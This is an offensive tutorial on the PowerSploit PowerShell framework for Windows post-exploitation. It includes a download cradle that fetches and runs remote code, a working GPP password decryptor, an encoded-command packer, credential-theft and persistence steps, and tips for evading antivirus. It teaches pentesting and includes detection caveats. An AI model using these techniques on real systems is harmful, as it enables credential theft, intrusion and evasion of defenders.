PowerSploit Framework: The Swiss Army Knife of Post-Exploitation

PowerSploit is a modular post-exploitation framework written in PowerShell, designed for penetration testers and red teamers to interact with Windows environments after gaining initial access. It focuses on privilege escalation, credential access, persistence, reconnaissance, and bypassing security defenses — all using native PowerShell.

Originally written by Matt Graeber (@mattifestation), with PowerView and PowerUp contributed by Will Schroeder (@harmj0y), PowerSploit gives operators in-memory tooling that is flexible, scriptable, and harder to spot than dropped binaries.

Category: Post-Exploitation → PowerShell Frameworks

You typically use PowerSploit after gaining a foothold on a Windows machine:

  • RDP access
  • Reverse shell
  • Evil-WinRM session
  • Compromised credentials

It complements rather than replaces tools like Metasploit or Cobalt Strike: the scripts are loaded into an existing session or C2 agent and blend in because they use what every Windows host already has (PowerShell).

Core modules

Module                              Description
PowerUp.ps1                         Identifies common privilege escalation paths on Windows
Invoke-Mimikatz.ps1                 Executes Mimikatz in memory to dump credentials
Get-GPPPassword.ps1                 Extracts plaintext credentials from Group Policy Preferences
Invoke-Shellcode.ps1                Injects shellcode into memory (payload never touches disk)
Add-Persistence                     Adds registry or scheduled task persistence (Persistence.psm1)
Invoke-ReflectivePEInjection.ps1    Reflectively loads EXEs/DLLs into memory (covert execution)

Each script is modular and can be run individually based on what you want to accomplish.

Why operators reach for it:

  • In-memory: scripts can be loaded through a download cradle and never touch disk (AMSI and script block logging still see the content, so this is fileless, not invisible)
  • Modular: import only the script you need, no bloat
  • Flexible: plain PowerShell, easy to modify for evasion or automation
  • Widely supported: Empire bundles PowerView and PowerUp, and most C2 frameworks can load the scripts in memory

Example: running PowerUp's checks

# Option A: pull the script straight into memory (nothing written to disk).
# Note that this fetches from the public repository, which is archived and no longer maintained.
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')
# Option B: import a local copy (start PowerShell with -ep bypass if the execution policy blocks it)
Import-Module .\PowerUp.ps1
# Either way, run every check in one go
Invoke-AllChecks

This runs multiple privilege escalation checks in one pass: unquoted service paths, services whose binary or registry key the current user can modify, AlwaysInstallElevated, DLL hijacking via writable %PATH% entries, autologon credentials in the registry, and cached GPP files, among others.
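To see what two of those checks actually do, here is an added example that re-implements the unquoted service path and AlwaysInstallElevated checks in plain PowerShell. It is not PowerUp's code; the function names (Test-AlwaysInstallElevated, Get-UnquotedServicePath, Test-DirectoryWritable) are illustrative, and the ACL check is simplified (it ignores Deny ACEs and generic rights).

```powershell
# Added example (not PowerSploit code): the logic behind two Invoke-AllChecks findings.

function Test-AlwaysInstallElevated {
    # msiexec installs an arbitrary MSI as SYSTEM only when BOTH policy values are 1
    $keys = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
            'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    foreach ($k in $keys) {
        $v = (Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        if ($v -ne 1) { return $false }
    }
    return $true
}

function Test-DirectoryWritable {
    # Simplified check: any Allow ACE for one of our SIDs granting a write-type right.
    # Ignores Deny ACEs and numeric generic rights (an assumption for brevity).
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids = @($identity.User) + @($identity.Groups)
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]) }
        catch { continue }
        if ($mySids -contains $sid -and $ace.FileSystemRights.ToString() -match 'Write|Modify|FullControl|CreateFiles') {
            return $true
        }
    }
    return $false
}

function Get-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc = $_
        $path = $svc.PathName
        if (-not $path -or $path.StartsWith('"')) { return }        # quoted paths are safe
        # Keep only the executable part: drop arguments after the first ".exe"
        $m = [regex]::Match($path, '^(.*?\.exe)', 'IgnoreCase')
        $exe = if ($m.Success) { $m.Groups[1].Value } else { $path }
        if ($exe -notmatch ' ') { return }                           # no space, nothing to hijack
        if ($exe -match '^[A-Za-z]:\\Windows\\') { return }          # system dirs are rarely writable; skip noise
        # CreateProcess tries C:\Program.exe, then C:\Program Files\Vendor.exe, ... before the real binary,
        # so the attacker needs write access to the directory holding any of those candidates
        $parts = $exe.Split(' ')
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
            $dir = Split-Path -Parent $candidate
            if (Test-DirectoryWritable $dir) {
                [pscustomobject]@{
                    ServiceName = $svc.Name
                    PathName    = $path
                    StartMode   = $svc.StartMode
                    Plant       = $candidate      # where a malicious EXE would be dropped
                }
            }
        }
    }
}

"AlwaysInstallElevated enabled: $(Test-AlwaysInstallElevated)"
Get-UnquotedServicePath | Format-Table -AutoSize
```

A hit from Get-UnquotedServicePath only matters if the service runs as a privileged account and the current user can restart it or wait for a reboot, which is why PowerUp also reports StartMode and whether the user can control the service.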

PowerSploit Tool Map: Framework Tree & Use Cases

Here’s a detailed tree map of its modules, tools, and where each fits into your offensive workflow.

PowerSploit/
├── Recon/                  → Domain & network enumeration
│   └── PowerView.ps1       → Active Directory enumeration; its Get-NetUser, Get-NetShare and
│                              Get-NetSession functions cover host recon, and it also holds
│                              Invoke-StealthUserHunter
│
├── Privesc/                → Privilege escalation
│   └── PowerUp.ps1         → Automated Windows privesc checks; Get-ServiceUnquoted,
│                              Get-RegAlwaysInstallElevated and the other checks are
│                              functions inside this one file
│
├── Exfiltration/           → Credential dumping, token abuse and data theft
│   ├── Invoke-Mimikatz.ps1 → Run Mimikatz in memory
│   ├── Get-GPPPassword.ps1 → Dump GPP-stored plaintext passwords
│   ├── Invoke-TokenManipulation.ps1 → Enumerate and impersonate tokens
│   └── Invoke-CredentialInjection.ps1 → Create a logon session with supplied credentials
│
├── Persistence/            → Establish foothold on reboot
│   ├── Persistence.psm1    → Add-Persistence: scheduled task, run key or WMI subscription
│   └── Install-SSP.ps1     → Register an SSP DLL to capture creds at logon
│
├── CodeExecution/          → Shellcode & binary injection
│   ├── Invoke-Shellcode.ps1 → Injects raw shellcode into memory
│   ├── Invoke-DllInjection.ps1 → Inject a DLL from disk into a target process
│   └── Invoke-ReflectivePEInjection.ps1 → In-memory PE loader
│
├── ScriptModification/     → Script packing and obfuscation
│   └── Out-EncodedCommand.ps1 → Compress and encode scripts for -EncodedCommand
│
└── AntivirusBypass/        → Work out what the AV signature matches on
    └── Find-AVSignature.ps1 → Split a flagged binary to locate the detected bytes

Note that the repository has no Credentials folder: the credential scripts live under Exfiltration, and the individual privesc checks are functions inside PowerUp.ps1 rather than separate files.

Module use cases

  • PowerView.ps1 – The most complete PowerShell-based AD enumeration tool; its Get-NetUser, Get-NetShare and Get-NetSession functions cover host-focused recon (users, shares, sessions) as well
  • PowerUp.ps1 – Runs all common escalation checks in one command (Invoke-AllChecks)
  • Get-ServiceUnquoted – Detects unquoted service paths where a parent directory is writable
  • Get-RegAlwaysInstallElevated – Identifies SYSTEM escalation via MSI when AlwaysInstallElevated is set in both HKLM and HKCU
  • Invoke-Shellcode.ps1 – Inject custom shellcode into the current or a remote process; staying off disk sidesteps file scanning, not memory scanning
  • Invoke-ReflectivePEInjection.ps1 – Load an EXE or DLL into memory without writing it to disk
  • Invoke-DllInjection.ps1 – Inject a DLL from disk into a target process
  • Invoke-Mimikatz.ps1 – Load Mimikatz reflectively to dump credentials from LSASS
  • Get-GPPPassword.ps1 – Decrypt cpassword values from Group Policy Preference XML in SYSVOL (MS14-025 stopped new ones being created but left existing files in place)
  • Invoke-CredentialInjection.ps1 – Create a logon session with supplied credentials (credential replay)
  • Add-Persistence – Scheduled task, run key, or permanent WMI subscription persistence
  • Install-SSP.ps1 – Registers a Security Support Provider DLL so LSASS hands it plaintext credentials at logon (takes effect after a reboot)
  • Invoke-StealthUserHunter – Find where privileged users are logged in by querying sessions on the file servers and DCs they use
  • Invoke-TokenManipulation.ps1 – Enumerate, impersonate, or spawn processes with stolen tokens
  • Out-EncodedCommand.ps1 – Compress and encode a script for -EncodedCommand; this is packing, not obfuscation, and script block logging still captures the decoded content
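The GPP decryption the list above describes is short enough to show in full. The following is an added example, not Get-GPPPassword.ps1 itself: the AES-256 key is the one Microsoft published in the MS-GPPREF specification, the Groups.xml is constructed for the demo (a real run walks SYSVOL instead), and the function names are illustrative.

```powershell
# Added example (not PowerSploit code): decrypting GPP cpassword values.
# The 32-byte AES key below is public (MS-GPPREF, "Password Encryption").
$GppAesKey = [byte[]](
    0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
    0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)

function New-GppAes {
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key = $GppAesKey
    $aes.IV = New-Object byte[] 16      # fixed all-zero IV
    $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    return $aes
}

function ConvertFrom-GppCpassword {
    param([Parameter(Mandatory)][string]$Cpassword)
    # GPP strips the base64 padding; restore it before decoding
    $b64 = $Cpassword
    switch ($b64.Length % 4) { 2 { $b64 += '==' } 3 { $b64 += '=' } }
    $cipher = [Convert]::FromBase64String($b64)
    $aes = New-GppAes
    $plain = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
    return [System.Text.Encoding]::Unicode.GetString($plain)   # password is stored as UTF-16LE
}

function ConvertTo-GppCpassword {
    # Only used here to build a realistic sample; the attack never needs to encrypt
    param([Parameter(Mandatory)][string]$Password)
    $aes = New-GppAes
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($Password)
    $cipher = $aes.CreateEncryptor().TransformFinalBlock($bytes, 0, $bytes.Length)
    return [Convert]::ToBase64String($cipher).TrimEnd('=')
}

function Get-GppCredentialFromXml {
    param([Parameter(Mandatory)][xml]$Xml)
    # Groups.xml holds <User> elements; Services.xml, ScheduledTasks.xml, DataSources.xml,
    # Drives.xml and Printers.xml carry cpassword in the same Properties attribute
    foreach ($node in $Xml.SelectNodes('//Properties[@cpassword]')) {
        [pscustomobject]@{
            UserName = $node.userName
            Password = ConvertFrom-GppCpassword $node.cpassword
            Changed  = $node.ParentNode.changed
        }
    }
}

# Constructed sample: the shape of a Groups.xml left behind in SYSVOL (made-up account and password)
$sampleCpassword = ConvertTo-GppCpassword 'Summer2014!'
[xml]$groupsXml = @"
<Groups>
  <User name="LocalAdmin" changed="2014-04-01 09:15:00">
    <Properties action="U" userName="LocalAdmin" cpassword="$sampleCpassword" neverExpires="1"/>
  </User>
</Groups>
"@
Get-GppCredentialFromXml $groupsXml | Format-Table -AutoSize

# Against a real domain, feed the same function every policy XML under SYSVOL, e.g.
# Get-ChildItem "\\$env:USERDNSDOMAIN\SYSVOL" -Recurse -Include Groups.xml,Services.xml,ScheduledTasks.xml,DataSources.xml,Drives.xml,Printers.xml
```

Because the key and IV are fixed and public, any domain user with read access to SYSVOL can recover these passwords; the only real fix is to delete the XML files that still carry a cpassword attribute.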
Operational notes:

  • Scripts can be imported individually, so you only load what the task needs
  • Empire embeds PowerView and PowerUp, and Cobalt Strike and other C2s can load the scripts in memory
  • Most modules run in memory, so nothing needs to be written to disk
  • The stock scripts are signatured by AV, EDR and AMSI, and script block logging records what they execute; rename functions, obfuscate, or modify them for real-world ops
Typical workflow:

  1. Gain initial access (reverse shell, Evil-WinRM, RDP)
  2. Run PowerView to map out users, computers, sessions, and groups
  3. Execute PowerUp to check for privilege escalation paths
  4. Use the credential modules (Mimikatz, GPP) to harvest creds
  5. Establish persistence via registry run keys or scheduled tasks
  6. Obfuscate and clean up traces to reduce detection

Because PowerSploit is well known, its stock scripts are fingerprinted by AV, EDR and AMSI. Use techniques like:

  • Obfuscating the script
  • Renaming functions and variables that signatures key on
  • Loading scripts in memory rather than from disk (this avoids file scanning, but AMSI and script block logging still see the content)
  • Wrapping it with tools like Invoke-Obfuscation
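To make the last point concrete, here is an added example (not Out-EncodedCommand.ps1, though it performs the same deflate-plus-base64 packing) that builds an -EncodedCommand payload and then queries the PowerShell Operational log for what script block logging recorded. Function names are illustrative; the query returns nothing unless script block logging is enabled on the host.

```powershell
# Added example (not PowerSploit code): pack a script the way Out-EncodedCommand does,
# then show why packing alone is not evasion once the block is logged.

function ConvertTo-PackedCommand {
    param([Parameter(Mandatory)][string]$Script)
    # Deflate-compress the script, then base64 the compressed bytes
    $ms = New-Object System.IO.MemoryStream
    $ds = New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Compress)
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($Script)
    $ds.Write($bytes, 0, $bytes.Length)
    $ds.Dispose()
    $b64 = [Convert]::ToBase64String($ms.ToArray())
    # Stub that inflates the payload at runtime and hands it to IEX
    $stub = "IEX (New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream(" +
            "(New-Object IO.MemoryStream(,[Convert]::FromBase64String('$b64'))), " +
            "[IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::UTF8)).ReadToEnd()"
    # powershell.exe -EncodedCommand expects base64 of UTF-16LE, not UTF-8
    return [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($stub))
}

function Find-LoggedScriptBlock {
    # Script block logging (Event ID 4104) records the decoded content that IEX executes,
    # so the original function names reappear in the log regardless of the packing.
    param([string[]]$Pattern = @('Invoke-AllChecks', 'Invoke-Mimikatz', 'Get-GPPPassword'))
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -ErrorAction SilentlyContinue |
        Where-Object { $msg = $_.Message; @($Pattern | Where-Object { $msg -match [regex]::Escape($_) }).Count -gt 0 } |
        Select-Object TimeCreated, @{ n = 'Snippet'; e = { $_.Message.Substring(0, [Math]::Min(120, $_.Message.Length)) } }
}

# Constructed payload standing in for a PowerSploit script
$packed = ConvertTo-PackedCommand 'Write-Output "hello from an inflated block"'
"powershell.exe -NoProfile -EncodedCommand $packed"   # what the operator would run on the target

# Round-trip check in the current session: decode the stub and execute it
$stubText = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($packed))
Invoke-Expression $stubText

# With script block logging on, the inflated text is now in the log in the clear
Find-LoggedScriptBlock -Pattern 'inflated block' | Format-Table -AutoSize
```

The takeaway is that -EncodedCommand and compression defeat a grep of the command line, not a defender reading 4104 events or an AMSI provider that sees the inflated text at invocation time; renaming functions and restructuring the script change what those see, encoding does not.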

PowerSploit is one of the foundational post-exploitation frameworks every Windows-focused pentester should know. While it may be noisy in modern environments without obfuscation, it still forms the basis for many in-house and C2 frameworks.

Use it in labs. Learn the modules. Understand how real-world privilege escalation and credential attacks work under the hood.
